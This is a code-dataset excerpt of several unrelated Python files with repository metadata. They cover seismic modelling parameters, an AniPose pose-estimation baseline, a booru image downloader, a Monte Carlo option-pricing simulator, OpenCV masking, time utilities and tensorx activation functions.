vp = crop_mamousi(segydir, fvp, x0, x1, z0, z1)
vs = crop_mamousi(segydir, fvs, x0, x1, z0, z1)
rho = crop_mamousi(segydir, frho, x0, x1, z0, z1) * 1000
srcpar = {'x0': acqOffset, 'zmin': acqOffset, 'zmax': z1 - z0 - acqOffset, 'dz': acqDz,
'fname': os.path.join('source', fsrc), 'fc': fc, 'srctype': srctype, 'amp': 1.}
recpar = {'x0': x1 - x0 - acqOffset, 'zmin': acqOffset, 'zmax': z1 - z0 - acqOffset, 'dz': acqDz,
'fname': os.path.join('receiver', frec)}
acqObj = AcqCw2(srcpar, recpar)
mod2dDict0 = {'vp': vp, 'rho': rho}
acqDict0 = acqObj.acqdict
modObj = mod2d(mod2dDict0, acqDict0, dxSgy, dxSgy)
modObj.fdParams(fc, tmax, '{:d}'.format(fd_order))
para={
'filename': os.path.join(basedir, 'CW_fdtest.inp'),
'descr': fmodel,
'MODE': 0, # forward_modelling_only=0;FWI=1;RTM=2
'PHYSICS': 2, # 2D-PSV=1;2D-AC=2;2D-VTI=3;2D-TTI=4;2D-SH=5
# domain decomposition and 2D grid
'NPROCX': 4, 'NPROCY': 7, 'NX': 100, 'NY': 100, 'DH': 1,
# time stepping
'TIME': tmax, 'DT': 1e-3,
# FD params
'FD_ORDER': 8,
'max_relative_error': 0, # Taylor (max_relative_error=0) and Holberg (max_relative_error=1-4)
# source
'QUELLART': 1, # ricker=1 (delayed 1.5 / fc);fumue=2;from_SOURCE_FILE=3;SIN**3=4;Gaussian_deriv=5;Spike=6;Klauder=7
'SOURCE_FILE': os.path.join('./source', fsrc),
'SIGNAL_FILE': './wavelet/wavelet_cw',
'TS': 8, # duration_of_Klauder_wavelet_(in_seconds)
'SRCTYPE': srctype, # 1=explosive, 2=point force in x, 3=point force in z, 4=custom directive force
'RUN_MULTIPLE_SHOTS': 1, # multiple shots one by one
'FC_SPIKE_1': -5, # corner_frequency_of_highpass_filtered_spike
'FC_SPIKE_2': 15, # orner_frequency_of_lowpass_filtered_spike
'ORDER_SPIKE': 5, # order_of_Butterworth_filter
'WRITE_STF': 0, # write_source_wavelet
# model
'READMOD': 1, # read_model_parameters_from_MFILE(yes=1)
'MFILE': os.path.join('./model', fmodel),
'WRITEMOD': 0,
# boundary conditions
'FREE_SURF': 0,
'FW': npml, # width_of_absorbing_frame_(in_gridpoints)
'DAMPING': 3000, # Damping_velocity_in_CPML_(in_m/s)
'FPML': fc, # Frequency_within_the_PML_(Hz)
'npower': 2.0, 'k_max_PML': 1.0,
# Q approximation
'L': 0, # Number_of_relaxation_mechanisms
'FL': 20000, # L_Relaxation_frequencies
# snapshots
'SNAP': 1, # output_of_snapshots_(SNAP)(yes>0)
'SNAP_SHOT': 1, # write_snapshots_for_shot_no_(SNAP_SHOT)
'TSNAP1': 0.05, # first_snapshot_(in_sec)
'TSNAP2': 1, # last_snapshot_(in_sec)
'TSNAPINC': 0.05, # increment_(in_sec)
'IDX': 1, # increment_x-direction
'IDY': 1, # increment_y-direction
'SNAP_FORMAT': 3, # data-format 2=ASCII, 3=BINARY
'SNAP_FILE': './snap/{:s}_waveform_forward'.format(fmodel), # basic_filename
# receiver input
'READREC': 1, # read_receiver_positions_from_file, 1=single_file, 2=multiple_files
'REC_FILE': os.path.join('./receiver', frec),
# towed streamer
'N_STREAMER': 0, # The_first_(N_STREAMER)_receivers_in_REC_FILE_belong_to_streamer
'REC_INCR_X': 80, 'REC_INCR_Y': 0, # Cable_increment_per_shot
# seismogram
'SEISMO': 2, # output_of_seismograms, 0: no seismograms; 1: particle-velocities;
# 2: pressure (hydrophones); 3: curl and div; 4: everything
'NDT': 1, # samplingrate_(in_timesteps!)
'SEIS_FORMAT': 1, # SU(1);ASCII(2);BINARY(3)
'SEIS_FILE_VX': os.path.join('./seismo', '{:s}_vx'.format(fmodel)), # filename_for_Vx
'SEIS_FILE_VY': os.path.join('./seismo', '{:s}_vy'.format(fmodel)), # filename_for_Vy
'SEIS_FILE_CURL': os.path.join('./seismo', '{:s}_curl'.format(fmodel)), # filename_for_curl
'SEIS_FILE_DIV': os.path.join('./seismo', '{:s}_div'.format(fmodel)), # filename_for_div
'SEIS_FILE_P': os.path.join('./seismo', '{:s}_p'.format(fmodel)), # filename_for_pressure
# log file
'LOG_FILE': os.path.join('./log', fmodel), # log-file_for_information_about_progress_of_program
'LOG': 2, # 0=no log; 1=PE 0 writes this info to stdout; 2=PE 0 also outputs information to LOG_FILE.0
# FWI
'ITERMAX': 100, # number_of_TDFWI_iterations
'JACOBIAN': 'jacobian/jacobian_test', # output_of_gradient
'DATA_DIR': 'su/MARMOUSI_spike/DENISE_MARMOUSI', # seismograms_of_measured_data
'TAPER': 0, # cosine_taper_(yes=1/no=0)
'TAPERLENGTH': 4, # taper_length_(in_rec_numbers)
'GRADT1': 21, 'GRADT2': 25, 'GRADT3': 490, 'GRADT4': 500, # gradient_taper_geometry
'INVMAT1': 1, # type_of_material_parameters_to_invert_(Vp,Vs,rho=1; Zp,Zs,rho=2; lam,mu,rho=3)
'QUELLTYPB': 1, # adjoint_source_type_(x-y_components=1, y_comp=2,
# x_comp=3, p_comp=4, x-p_comp=5, y-p_comp=6, x-y-p_comp=7)
'TESTSHOT_START': 25, 'TESTSHOT_END': 75, 'TESTSHOT_INCR': 10,# testshots_for_step_length_estimation
# gradient taper geometry
'SWS_TAPER_GRAD_VERT': 0, # apply_vertical_taper_(yes=1)
'SWS_TAPER_GRAD_HOR': 0, # apply_horizontal_taper
'EXP_TAPER_GRAD_HOR': 2.0, # exponent_of_depth_scaling_for_preconditioning
'SWS_TAPER_GRAD_SOURCES': 0, # apply_cylindrical_taper_(yes=1)
'SWS_TAPER_CIRCULAR_PER_SHOT': 0, # apply_cylindrical_taper_per_shot
'SRTSHAPE': 1, # damping shape (1=error_function,2=log_function)
'SRTRADIUS': 5., # radius_in_m, minimum for SRTRADIUS is 5x5 gridpoints
'FILTSIZE': 1, # filtsize_in_gridpoints
'SWS_TAPER_FILE': 0, # read_taper_from_file_(yes=1)
# output of ivnerted models
'INV_MOD_OUT': 1, # write_inverted_model_after_each_iteration_(yes=1)
'INV_MODELFILE':'model/modelTest', # output_of_models
# upper and lower limits of model params
'VPLOWERLIM': 3000, 'VPUPPERLIM': 4500, # lower/upper_limit_for_vp/lambda
'VSLOWERLIM': 1500, 'VSUPPERLIM': 2250, # lower/upper_limit_for_vs/mu
'RHOLOWERLIM': 2000, 'RHOUPPERLIM': 2600, # lower/upper_limit_for_rho
'QSLOWERLIM': 10, 'QSUPPERLIM': 100, # lower/upper_limit_for_Qs
# optimization method
'GRAD_METHOD': 2, # gradient_method_(PCG=1/LBFGS=2)
'PCG_BETA': 2, # preconditioned conjugate gradient
# Fletcher_Reeves=1, Polak_Ribiere=2, Hestenes_Stiefel=3, Dai_Yuan=4
'NLBFGS': 20, # save_(NLBFGS)_updates_during_LBFGS_optimization
# smoothing models
'MODEL_FILTER': 0, # apply_spatial_filtering_(1=yes)
'FILT_SIZE': 5, # filter_length_in_gridpoints
# Reduce size of inversion grid
'DTINV': 3, # use_only_every_DTINV_time_sample_for_gradient_calculation
# step length estimation
'EPS_SCALE': 0.01, # maximum_model_change_of_maximum_model_value
'STEPMAX': 6, # maximum_number_of_attemps_to_find_a_step_length
'SCALEFAC': 2.0,
# trace killing
'TRKILL': 0, # apply_trace_killing_(yes=1)
'TRKILL_FILE': './trace_kill/trace_kill.dat', #
# time damping
'PICKS_FILE': './picked_times/picks_', # files_with_picked_times
# FWI log
'MISFIT_LOG_FILE': 'LOG_TEST.dat', # log_file_for_misfit_evolution
'MIN_ITER': 0, # minimum number of iteration per frequency
# Definition of smoothing the Jacobians with 2D-Gaussian
'GRAD_FILTER': 0, # apply_spatial_filtering_(yes=1)
'FILT_SIZE_GRAD': 10, # filter_length_in_gridpoints
# FWT double-difference time-lapse mode
'TIMELAPSE': 0, # activate_time_lapse_mode_(yes=1); if TIMELAPSE == 1,
# DATA_DIR should be the directory containing the data differences
'DATA_DIR_T0': 'su/CAES_spike_time_0/DENISE_CAES', # seismograms_of_synthetic_data_at_t0_()
# RTM
'RTMOD': 0, # apply_reverse_time_modelling_(yes=1)
'RTM_SHOT': 0, # output_of_RTM_result_for_each_shot_(yes=1)
# gravity modeling/inversion
'GRAVITY': 0, # 0 = no gravity modeling, 1 = active_gravity_modelling_, 2=inversion
}
para['DH'] = modObj.dx
para['DT'] = modObj.dt
para['TIME'] = modObj.dt * modObj.nt
nx, nz = modObj.vp.shape
vptest = np.ones((nx, nz), dtype=np.float32) * 3000
vstest = np.ones((nx, nz), dtype=np.float32) * 3000
rhotest = np.ones((nx, nz), dtype=np.float32) * 2000
deniseIO.calc_max_freq(vptest, vstest, para)
deniseIO.check_stability(vptest, vstest, para)
para['FW'] = int(dpml / para['DH'])
para['DAMPING'] = 3000
print_factors(nx, nz)
para['NPROCX'] = 4
para['NPROCY'] = 7
para['NX'] = nx
para['NY'] = nz
deniseIO.check_domain_decomp(para)
deniseIO.write_denise_para(para)
acqObj.write_acq(basedir)
dict_mfile = {'vp': vptest, 'vs': vstest, 'rho': rhotest}
write_mfile(para['MFILE'], dict_mfile, basedir)
| [
"[email protected]"
] | |
0b0864d7bcd9a8bbbafc7d85f9f8e90a96bd8a47 | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /metapose/launch_anipose.py | 928740a6681f6e2cee01b6aa52cdd923c73d23b3 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 7,366 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch script for running a classical bundle adjustment baseline."""
from absl import app
from absl import flags
from aniposelib import cameras as anipose_cameras
import cv2
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds
from metapose import data_utils
from metapose import inference_time_optimization as inf_opt
_INPUT_PATH = flags.DEFINE_string('input_path', '', '')
_OUTPUT_PATH = flags.DEFINE_string('output_path', None, '')
_DEBUG_FIRST_N = flags.DEFINE_integer('debug_first_n', None,
'read only first n records')
_CAM_SUBSET = flags.DEFINE_list('cam_subset', list(map(str, range(4))), '')
_ADJUST_CAM = flags.DEFINE_bool('adjust_cam', True,
'true - BA on cams, false - triangulation')
_GT_INIT = flags.DEFINE_bool('gt_init', True, '')
_GT_HT = flags.DEFINE_bool('gt_ht', False, '')
flags.mark_flag_as_required('output_path')
def get_anipose_gt_camera(data_rec, cam_id):
"""Get AniPose.Camera with GT initialization."""
cam_pose3d, cam_rot, cam_intr = [
data_rec[x] for x in ['cam_pose3d', 'cam_rot', 'cam_intr']
]
rot_mat = cam_rot[cam_id].numpy()
t = cam_pose3d[cam_id].numpy()
rvec = cv2.Rodrigues(rot_mat)[0]
tvec = np.dot(rot_mat, -t)
f = np.mean(cam_intr[cam_id][:2])
k1 = 0
params = np.concatenate([rvec.ravel(), tvec.ravel(), [f, k1]])
camera = anipose_cameras.Camera()
camera.set_params(params)
return camera
def perturb_anipose_camera(cam):
ani_params = cam.get_params()
new_ani_params = np.concatenate([np.random.normal(size=6), ani_params[6:]])
cam.set_params(new_ani_params)
def get_pppx_pose2d_pred_and_gt(data_rec, cam_id):
"""Get 2D pose GT and mean predicted per-view 2D pose in pixels."""
bbox = data_rec['bboxes'][cam_id].numpy()
size = np.maximum(bbox[1] - bbox[0], bbox[3] - bbox[2])
origin = np.stack([bbox[2], bbox[0]], axis=-1)
pose2d_mean_pred = data_rec['pose2d_pred'][cam_id].numpy()
pose2d_gt = data_rec['pose2d_repr'][cam_id].numpy()
pp = data_rec['cam_intr'][cam_id][2:].numpy()
pose2d_mean_pred_pix = pose2d_mean_pred * size + origin - pp
pose2d_gt_pix = pose2d_gt * size + origin - pp
return pose2d_mean_pred_pix, pose2d_gt_pix
def run_anipose_bundle_adjustment(data_rec,
ba_cam=True,
gt_init=True,
gt_ht=False):
"""Run AniPose bundle adjustment."""
n_cam = data_rec['cam_rot'].shape[0]
cameras = [get_anipose_gt_camera(data_rec, i) for i in range(n_cam)]
if not gt_init:
for cam in cameras:
perturb_anipose_camera(cam)
gt_idx = 1 if gt_ht else 0
pose2d_preds = np.array(
[get_pppx_pose2d_pred_and_gt(data_rec, i)[gt_idx] for i in range(n_cam)])
camera_group = anipose_cameras.CameraGroup(cameras)
  error = float('nan')  # no bundle-adjustment residual in triangulation-only mode
  if ba_cam:
    error = camera_group.bundle_adjust_iter(pose2d_preds)
pose3d_pred = camera_group.triangulate(pose2d_preds)
ani_params_cam0 = camera_group.cameras[0].get_params()
rot_mat_cam0 = cv2.Rodrigues(ani_params_cam0[:3])[0]
pose3d_pred_cam0 = pose3d_pred @ rot_mat_cam0.T
all_ani_params = np.array([c.get_params() for c in camera_group.cameras])
return pose3d_pred_cam0, all_ani_params, error
def pmpje(pose3d_pred, pose3d_gt):
aligned_pose = inf_opt.align_aba(pose3d_pred, pose3d_gt)[0]
diff = aligned_pose - pose3d_gt
return tf.reduce_mean(tf.linalg.norm(diff, axis=-1), axis=-1)
def center_pose(pose3d):
return pose3d - tf.reduce_mean(pose3d, axis=0, keepdims=True)
def nmpje_pck(pose3d_pred_cam0, pose3d_gt_cam0, threshold=150):
"""Compute Normalized MPJE and PCK metrics."""
norm = tf.linalg.norm
pose3d_gt_cent = center_pose(pose3d_gt_cam0)
pose3d_pred_cent = center_pose(pose3d_pred_cam0)
scale_factor = norm(pose3d_gt_cent) / norm(pose3d_pred_cent)
pose3d_pred_cent_scaled = scale_factor * pose3d_pred_cent
diff = pose3d_gt_cent - pose3d_pred_cent_scaled
  errs = tf.linalg.norm(diff, axis=-1)
  nmpje = tf.reduce_mean(errs, axis=-1)
  pck = tf.reduce_mean(tf.cast(errs < threshold, tf.float32)) * 100
return nmpje, pck
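# Shape sanity-check sketch (hypothetical tensors, not part of the pipeline):
#   pose3d_pred = tf.random.normal([17, 3]); pose3d_gt = tf.random.normal([17, 3])
#   nmpje, pck = nmpje_pck(pose3d_pred, pose3d_gt)  # mean joint error (same units as poses) and PCK (%)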
def run_and_evaluate(data_rec, cam_subset, adjust_cam, gt_init, gt_ht):
"""Run AniPose bundle adjustment and compute metrics."""
data_rec = inf_opt.convert_rec_pose2d_to_bbox_axis(data_rec)
data_rec = inf_opt.take_camera_subset(data_rec, cam_subset)
pose3d_gt = data_rec['pose3d'].numpy()
pose3d_gt_cam0 = (pose3d_gt @ tf.transpose(data_rec['cam_rot'][0]))
pose3d_pred_cam0, ani_params_pred, ba_error = run_anipose_bundle_adjustment(
data_rec, adjust_cam, gt_init, gt_ht)
errs = np.array([
ba_error,
pmpje(pose3d_pred_cam0, pose3d_gt),
*nmpje_pck(pose3d_pred_cam0, pose3d_gt_cam0)
])
output = {
**data_rec,
'pose3d_pred_cam0': pose3d_pred_cam0,
'ani_params_pred': ani_params_pred,
'ba_pmpje_nmpje_pck_errs': errs,
}
output_np = {k: np.array(v) for k, v in output.items()}
return output_np
def main(_):
cam_subset = list(map(int, _CAM_SUBSET.value))
n_cam = len(cam_subset)
output_shape_dtype = {
# anipose results
'pose3d_pred_cam0': ([17, 3], tf.float64),
'ani_params_pred': ([n_cam, 8], tf.float64),
'ba_pmpje_nmpje_pck_errs': ([
4,
], tf.float64),
# input data
'pose3d': ([17, 3], tf.float64),
'cam_pose3d': ([n_cam, 3], tf.float64),
'cam_rot': ([n_cam, 3, 3], tf.float64),
'cam_intr': ([n_cam, 4], tf.float64),
'cam_kd': ([n_cam, 5], tf.float64),
'pose2d_gt': ([n_cam, 17, 2], tf.float64),
'pose2d_repr': ([n_cam, 17, 2], tf.float64),
'heatmaps': ([n_cam, 17, 4, 4], tf.float64),
# note! pose2d_pred is actually the "mean heatmap" 2D pred
'pose2d_pred': ([n_cam, 17, 2], tf.float64),
'keys': ([n_cam], tf.string),
'bboxes': ([n_cam, 4], tf.int32),
'pose3d_epi_pred': ([n_cam, 17, 3], tf.float32),
# config
'cam_subset': ([n_cam], tf.int32),
}
output_spec = tfds.features.FeaturesDict({
k: tfds.features.Tensor(shape=s, dtype=d)
for k, (s, d) in output_shape_dtype.items()
})
ds = data_utils.read_tfrec_feature_dict_ds(_INPUT_PATH.value)
if _DEBUG_FIRST_N.value is not None:
ds = ds.take(_DEBUG_FIRST_N.value)
dataset = []
for _, data_rec in ds:
opt_stats = run_and_evaluate(data_rec, cam_subset, _ADJUST_CAM.value,
_GT_INIT.value, _GT_HT.value)
print('ba / pmpje / nmpje / pck', opt_stats['ba_pmpje_nmpje_pck_errs'])
dataset.append(opt_stats)
data_utils.write_tfrec_feature_dict_ds(dataset, output_spec,
_OUTPUT_PATH.value)
if __name__ == '__main__':
app.run(main)
| [
"[email protected]"
] | |
a8572ed76842012079600e505ff96ed2f3ad217c | 4e79c63941476046816d937d4e8f90d26c05e748 | /main_bulk.py | c098c9d204231295e56f6df7995e53d5981cb4fd | [] | no_license | ouromoros/booru_downloader | a41963c8d0c9317d9934bf5c251b44c4f7917440 | b86b0f63d3a0fb001bc601534fe2434940a95955 | refs/heads/master | 2021-04-03T06:54:00.869390 | 2018-10-22T10:35:15 | 2018-10-22T10:35:15 | 124,854,821 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | import requests
import time
from bs4 import BeautifulSoup
import os
from optparse import OptionParser
import datetime
import threading
# parameters to be defined
website = 'http://konachan.net/post' # 'http://lolibooru.moe/post'
download_path = '/home/chaos/opt/pip/white'
tags = ''
pages = 1
image_count = 1
class dThread(threading.Thread):
    '''Worker thread that downloads a single image URL (fadr) into download_path.'''
def __init__(self, fadr):
threading.Thread.__init__(self)
self.fadr = fadr
def run(self):
name = requests.utils.unquote(self.fadr[self.fadr.rfind('/') + 1:])
self.iname = name
if os.path.isfile(download_path + '/' + name):
return
if not os.path.isdir(download_path):
os.mkdir(download_path)
print('Downloading ' + name[name.rfind('/') + 1:])
content = requests.get(self.fadr)
with open(download_path + '/' + name, 'wb') as f:
f.write(content.content)
def dpage(page):
main_page = requests.get(website, params={'tags': tags, 'page': page})
soup = BeautifulSoup(main_page.text, 'html.parser')
images = soup.find_all('a', class_='directlink')
#soup.find_all('a', {'class': 'directlink smallimg'})
threads = []
for img in images:
t = dThread('http:' + img['href'])
t.start()
threads.append(t)
time.sleep(0.5)
for t in threads:
t.join()
        print('Finished downloading {}'.format(t.iname))
def arguments():
parser = OptionParser()
parser.add_option("-t", "--tag", help="the tags of picture you want")
parser.add_option('-p', '--page', help='pages of images you want')
parser.add_option('-u', '--url', help='url of the target website')
parser.add_option(
'-d', '--directory', help='directory where pictures are to be stored')
return parser.parse_args()
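# Example invocation (illustrative values):
#   python main_bulk.py -t "landscape" -p 3 -u http://konachan.net/post -d ./downloads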
if __name__ == '__main__':
# processing args
(options, args) = arguments()
# download_path += ('/' + str(datetime.date.today()))
if options.tag:
tags = options.tag
if options.page:
pages = int(options.page)
if options.url:
website = options.url
if options.directory:
download_path = options.directory
# Downloading files
for i in range(pages):
dpage(i + 1)
| [
"[email protected]"
] | |
ad2330d8afc9b51696c93c8c657b6ae40639a143 | 890657e5e5d0668fdb7015abc3ea78313b9abcbf | /simStock.py | c4122c978895211fae5145f404e84607235e2269 | [] | no_license | grsmith1943/econophysics | 4d3f72f1b4761364136978c94614895c7cc0e325 | eef63511dbabec637272368bbb7a47a3b4caa670 | refs/heads/master | 2021-06-14T03:33:44.307066 | 2017-03-06T05:40:17 | 2017-03-06T05:40:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,685 | py | import sys
import numpy as np
import matplotlib.pyplot as plt
# simulates the path of a stock and outputs the estimated call and put prices
def simStock(r=0.01, mu=0.01, sigma=0.01, T=60, S=15, X=15, N=1000, n=30):
dt = T/N
calls, puts = [None]*n, [None]*n
for path in range(n):
pathPrice = [None] * N
pathPrice[0] = S
for j in range(N - 1):
epsilon = np.random.normal()
dS = pathPrice[j] * (mu*dt + sigma*epsilon*dt**0.5)
pathPrice[j+1] = pathPrice[j] + dS
#get the call and put price for this particular option
calls[path] = np.exp(-1*r*T) * max(pathPrice[-1] - X, 0)
puts[path] = np.exp(-1*r*T) * max(X - pathPrice[-1], 0)
plt.plot(pathPrice)
callPrice = np.mean(calls)
putPrice = np.mean(puts)
print("Given that the option's strike price is %f and days till expiry is %i:"%(X,T))
print("The optimal call price:", callPrice)
print("The optimal put price: ", putPrice)
#opens the window that actually displays the plots on top of each other
plt.xlabel("Day")
plt.ylabel("Asset price (USD)")
plt.show()
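# The inner update is the Euler-Maruyama discretization of geometric Brownian
# motion, dS_t = mu*S_t*dt + sigma*S_t*dW_t with dW_t ~ N(0, dt); the estimates
# are discounted Monte Carlo payoff means:
#   C ~ exp(-r*T) * mean(max(S_T - X, 0)),   P ~ exp(-r*T) * mean(max(X - S_T, 0))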
def main():
r = float(input("Risk-free interest rate: "))
mu = float(input("Asset's daily return rate: "))
sigma = float(input("Volatility of asset: "))
T = float(input("Days till this option's expiry date: "))
S = float(input("Asset's current price: "))
X = float(input("This option's strike price: "))
N = int(input("Time steps per simulation: "))
n = int(input("Number of simulation paths: "))
simStock(r=r, mu=mu, sigma=sigma, T=T, S=S, X=X, N=N, n=n)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
e7e8f4cff06e14fcbc56bac03f97f74a51c810d3 | c1ed05a3c546d3580ac0bb0e66bcaddaf8d78b28 | /app/models/time_utils.py | 584226049bdc48b57f288886692a59ca9c223514 | [] | no_license | lelandbatey/whereIAm | 382108fd296ab69e97ac8bf6a11a3aaf7cef7de4 | 66c071cce541f65bfcf1a1865948e5a4abe55601 | refs/heads/master | 2022-08-07T17:10:15.354394 | 2022-07-12T00:50:16 | 2022-07-12T00:50:16 | 17,266,937 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,170 | py | from __future__ import print_function
import time
import datetime
# Test
def simplefmt_in_pdt_to_utc_epoch(moment):
"""Converts simple format string as if taken in PDT to UTC.
This function is good for helping a developer in PDT query times in a
format they're comfortable with.
"""
t = simplefmt_to_datetime(moment)
# Add 7 hours
t += datetime.timedelta(0, 25200)
return datetime_to_epoch(t)
def datetime_to_oddformat(moment):
"""Converts datetime object to format %Y-%m-%dT%H:%M:%S.%fZ"""
return datetime.datetime.strftime(moment, "%Y-%m-%dT%H:%M:%S.%fZ")
def oddformat_to_datetime(odd):
"""Converts string in %Y-%m-%dT%H:%M:%S.%fZ to datetime"""
return datetime.datetime.strptime(odd, "%Y-%m-%dT%H:%M:%S.%fZ")
def simplefmt_to_datetime(moment):
"""Converts string in %H:%M:%S %d-%m-%y to datetime"""
return datetime.datetime.strptime(moment, "%H:%M:%S %d-%m-%y")
def epoch_to_datetime(epoch):
"""Converts an epoch timestamp to datetime."""
return datetime.datetime.fromtimestamp(epoch)
def datetime_to_epoch(indate):
"""Converts a datetime object to an epoch timestamp."""
return (indate - datetime.datetime(1970, 1, 1)).total_seconds()
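# Round-trip sketch (illustrative): "01-06-15" parses as 1 June 2015, so
#   datetime_to_epoch(simplefmt_to_datetime("12:00:00 01-06-15")) == 1433160000.0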
| [
"[email protected]"
] | |
6e85b271ef79c17d8c18fcf939716b7ef7bf09cc | 47dd1fe92dd3b918881171c8159c2da931a43cd0 | /erasing_background.py | 8c0238257df9f08f233e52a1c507257cab098a12 | [] | no_license | HCl3646/Ball-Recognizing | eef38c40e0ee3978c53ce61e654b91a14656f684 | 4707f93800b2e08401fc237b3b68d6db2e571ff1 | refs/heads/main | 2023-07-16T14:35:22.326111 | 2021-08-25T10:00:45 | 2021-08-25T10:00:45 | 390,645,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | import cv2
import numpy as np
import sys
import math
# Zero out every pixel lying outside all given circles; each entry of `circle`
# appears to be a ((cx, cy), radius) pair, e.g. from cv2.minEnclosingCircle.
def afterFindCircle(src, circle):
for y in range(len(src)):
for x in range(len(src[y])):
count = 0
for cnt in circle:
formula = (y - cnt[0][1]) ** 2 + (x - cnt[0][0]) ** 2
if formula > (cnt[1])**2:
count += 1
if count == len(circle):
src[y][x] = 0
return src
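# A vectorized equivalent sketch (same ((cx, cy), radius) format assumed):
#   ys, xs = np.ogrid[:src.shape[0], :src.shape[1]]
#   outside = np.ones(src.shape[:2], dtype=bool)
#   for (cx, cy), r in circle:
#       outside &= (ys - cy) ** 2 + (xs - cx) ** 2 > r ** 2
#   src[outside] = 0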
def BackGroundHSV(img, low, high):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv = cv2.GaussianBlur(hsv, (0, 0), 1.0)
color_lo = np.array(low)
color_hi = np.array(high)
mask = cv2.inRange(hsv, color_lo, color_hi)
img[mask > 0] = [0, 0, 0]
return img | [
"[email protected]"
] | |
e58c5f71e7e0260f7e30521044465cd8a9326093 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02778/s173819636.py | 68ef04cad2b1b6d8ccded1faecc1b0de046a7534 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46 | py | S=input()
l=len(S)
X = 'x' * l  # mask every character of S with 'x'
print(X) | [
"[email protected]"
] | |
7a3d0337ce71f1be2261bb1b53e4460a25995c0c | a142942a91142f7139a74c3843527220caefc7e0 | /model/pawns/behaviors/moving_behaviors/explorer.py | d8955a298dbd9d77476d5efc591ca34e7ed19343 | [] | no_license | ME-JAD/projet-python-les-roms | 2ae2c6c703e0c575d4cafba47845c38bd91cf302 | 7c006a1c887de2b88feb658719dc28e17de1be09 | refs/heads/main | 2023-06-26T00:35:21.610800 | 2021-07-26T08:07:21 | 2021-07-26T08:07:21 | 369,602,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from model.pawns.behaviors.moving_behaviors.anarchic_abstract import AnarchicAbstract
class Explorer(AnarchicAbstract):
def __init__(self):
super().__init__(0.04)
def to_string(self) -> str:
return "explorer"
| [
"[email protected]"
] | |
d183fc7c9346569cfd30247f70f6d734d228465a | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/abc066/B/4898222.py | d42241014312de127729cea09494cd0e85291565 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | s = input()
found = 0  # length of the longest even prefix s[:i] whose two halves are equal
for i in range(len(s)):
if i % 2 == 0 and i >= 2:
t = s[:i//2]
t2 = s[i//2:i]
if t == t2:
found = i
print(found) | [
"[email protected]"
] | |
f4f5cc0bfddd33da8f868b066af7b61019f05d75 | 0f2a9eab881c471e32b9467280633a2649519861 | /tensorx/activation.py | c8e2efa1af2e090d7128861133dc4ba83f3aefe0 | [
"Apache-2.0"
] | permissive | mkdir700/tensorx | 97720423109ffcd5cd50c21909051e31ffca07d1 | 11d7727b055fbee29e122ffbfc7a39057aeeae40 | refs/heads/master | 2023-03-15T19:32:31.002867 | 2021-01-16T21:20:37 | 2021-01-16T21:22:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,062 | py | import tensorflow as tf
import math
from tensorx.utils import as_tensor
def identity(x, name: str = None) -> tf.Tensor:
""" Identity function
Returns a tensor with the same content as the input tensor.
Args:
x (`Tensor`): The input tensor.
name (`str`): name for this op
Returns:
tensor (`Tensor`): of the same shape, type and content of the input tensor.
"""
return tf.identity(x, name=name)
def sigmoid(x):
""" Sigmoid function
Element-wise sigmoid function, defined as:
$$
f(x) = \\frac{1}{1 + \\exp(-x)}
$$
Args:
x (`Tensor`): A tensor or variable.
Returns:
A tensor (`Tensor`): with the result of applying the sigmoid function to the input tensor.
"""
return tf.nn.sigmoid(x)
def hard_sigmoid(x, name="hard_sigmoid"):
""" Hard Sigmoid
Segment-wise linear approximation of sigmoid. (Faster than sigmoid)
!!! note
Approximates the sigmoid function in 3 parts: 0, scaled linear, 1.
returns `0.` if `x < -2.5`, `1.` if `x > 2.5`.
In `-2.5 <= x <= 2.5`, returns `0.2 * x + 0.5`.
Args:
x (`Tensor`): input tensor
name (`str`): name for this op
Returns:
        tensor (`Tensor`): the result of applying an approximated element-wise sigmoid to the input tensor
"""
x = as_tensor(x)
with tf.name_scope(name):
slope = as_tensor(0.2, x.dtype)
shift = as_tensor(0.5, x.dtype)
x = (slope * x) + shift
zero = as_tensor(0., x.dtype)
one = as_tensor(1., x.dtype)
x = tf.clip_by_value(x, zero, one)
return x
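# e.g. hard_sigmoid([-3., 0., 3.]) -> [0., 0.5, 1.]: the linear segment
# 0.2 * x + 0.5 clipped to [0, 1].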
def tanh(x):
